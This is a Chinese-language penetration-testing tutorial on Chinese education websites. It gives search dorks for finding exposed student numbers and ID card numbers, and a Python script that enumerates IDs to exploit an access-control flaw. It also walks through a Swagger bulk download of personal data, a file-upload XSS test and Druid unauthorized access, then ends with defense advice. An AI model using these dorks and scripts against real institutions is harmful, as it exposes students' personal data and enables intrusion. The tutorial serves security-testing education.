教育证书站渗透测试技术指南<\/h1>

信息收集方法论<\/h2>

搜索引擎高级语法<\/h3>

基础语法组合<\/strong>：<\/p>

domain="edu.cn"&&body="注册"&&body="Login"&&title="系统"<\/code><\/li>
body="\/upload"<\/code> 查找上传功能点<\/li>
site: xxx.edu.cn intext:"学号|身份证|姓名|24&23级信息"<\/code> 查找敏感信息<\/li> <\/ul> <\/li>
文件类型搜索<\/strong>：<\/p> site: *.edu.cn filetype:txt OR filetype:xls OR filetype:xlsx OR filetype:doc OR filetype:docx OR filetype:pdf<\/code><\/li> 可扩展搜索关键词：林业管理、物业管理、城市管理、学生管理、交通管理、智慧平台、校园卡等<\/li> <\/ul> <\/li> <\/ol> 工具推荐<\/h3> Hunter<\/strong>：用于大规模信息收集和测绘<\/li> Google Hacking Database<\/strong>：参考已有搜索语法模板<\/li> <\/ul> 渗透测试案例详解<\/h2> 案例1：水平越权漏洞<\/h3> 发现过程<\/h4> 使用Hunter发现技校迎新系统<\/li> 通过Google语法 site:URL intext:"sfz|xh"<\/code> 收集到身份证号和学号<\/li> <\/ol> 漏洞验证<\/h4> 发现"查看通知书"功能存在ID参数<\/li> 修改ID值成功越权访问他人信息<\/li> <\/ol> 自动化验证脚本<\/h4> import<\/span> requests <\/span><\/span>import<\/span> concurrent.futures <\/span><\/span> <\/span><\/span>url_prefix =<\/span> "目标URL前缀"<\/span> <\/span><\/span>success_count =<\/span> 0<\/span> <\/span><\/span> <\/span><\/span>def<\/span> check_url<\/span>(xsid): <\/span><\/span> global<\/span> success_count <\/span><\/span> full_url =<\/span> url_prefix +<\/span> xsid <\/span><\/span> try<\/span>: <\/span><\/span> response =<\/span> requests.<\/span>get(full_url, timeout=<\/span>5<\/span>) <\/span><\/span> if<\/span> response.<\/span>status_code ==<\/span> 200<\/span>: <\/span><\/span> success_count +=<\/span> 1<\/span> <\/span><\/span> print(f<\/span>"Success: <\/span>{<\/span>full_url}<\/span>"<\/span>) <\/span><\/span> except<\/span> requests.<\/span>exceptions.<\/span>RequestException: <\/span><\/span> pass<\/span> <\/span><\/span> <\/span><\/span>with<\/span> concurrent.<\/span>futures.<\/span>ThreadPoolExecutor(max_workers=<\/span>10<\/span>) as<\/span> executor: <\/span><\/span> executor.<\/span>map(lambda<\/span> i: check_url(f<\/span>"<\/span>{<\/span>i:<\/span>04d<\/span>}<\/span>"<\/span>), range(10000<\/span>)) <\/span><\/span> <\/span><\/span>print(f<\/span>"<\/span>\n<\/span>Total successful responses: <\/span>{<\/span>success_count}<\/span>"<\/span>) <\/span><\/span><\/code><\/pre>案例2：Swagger接口未授权+任意文件下载<\/h3> 发现过程<\/h4> 发现Swagger API文档未授权访问<\/li> 使用工具自动遍历API接口<\/li> <\/ol> 利用工具<\/h4> swagger-exp<\/strong>：https:\/\/github.com\/lijiejie\/swagger-exp 将接口保存为api-docs.json<\/li> 运行swagger-exp.py自动测试接口<\/li> <\/ol> <\/li> <\/ul> 漏洞利用<\/h4> 发现获取人员信息的接口<\/li> 通过参数控制(如2000条)批量下载敏感信息<\/li> 成功获取身份证等敏感数据<\/li> <\/ol> 案例3：任意文件上传漏洞<\/h3> 发现过程<\/h4> 外围测试发现未授权接口<\/li> 修改请求方法为POST尝试上传<\/li> <\/ol> 漏洞利用<\/h4> 上传XML文件测试XSS<\/li> 从响应中获取文件路径<\/li> 直接访问上传的文件验证漏洞<\/li> <\/ol> 案例4：Druid未授权访问<\/h3> 发现过程<\/h4> 通用系统特征识别<\/li> 查找同类系统发现专家入口<\/li> 抓包分析发现认证参数<\/li> <\/ol> 漏洞利用<\/h4> 使用发现的key成功登录系统<\/li> Burp检测到Druid监控页面<\/li> 直接访问\/druid路径验证未授权访问<\/li> <\/ol> 防御建议<\/h2> 信息泄露防护<\/strong>：<\/p> 严格限制搜索引擎爬虫<\/li> 敏感文档设置访问权限<\/li> 定期检查公开信息<\/li> <\/ul> <\/li> 接口安全<\/strong>：<\/p> Swagger等API文档需授权访问<\/li> 接口参数严格校验<\/li> 实施速率限制<\/li> <\/ul> <\/li> 权限控制<\/strong>：<\/p> 实施完善的权限验证<\/li> 关键操作二次认证<\/li> 避免直接使用可预测的ID<\/li> <\/ul> <\/li> 文件安全<\/strong>：<\/p> 严格限制上传文件类型<\/li> 上传内容安全检查<\/li> 存储路径随机化<\/li> <\/ul> <\/li> 监控系统安全<\/strong>：<\/p> Druid等监控系统必须设置强认证<\/li> 修改默认访问路径<\/li> 限制访问IP范围<\/li> <\/ul> <\/li> <\/ol> 扩展资源<\/h2> 信息收集高级技巧：<\/p> https:\/\/xz.aliyun.com\/t\/15337<\/li> https:\/\/xz.aliyun.com\/t\/9994<\/li> <\/ul> <\/li> Druid深入利用：<\/p> 参考专业安全分析文章<\/li> <\/ul> <\/li> 自动化测试框架：<\/p> 推荐使用Burp Suite专业版进行自动化扫描<\/li> 结合自定义脚本提高效率<\/li> <\/ul> <\/li> <\/ol>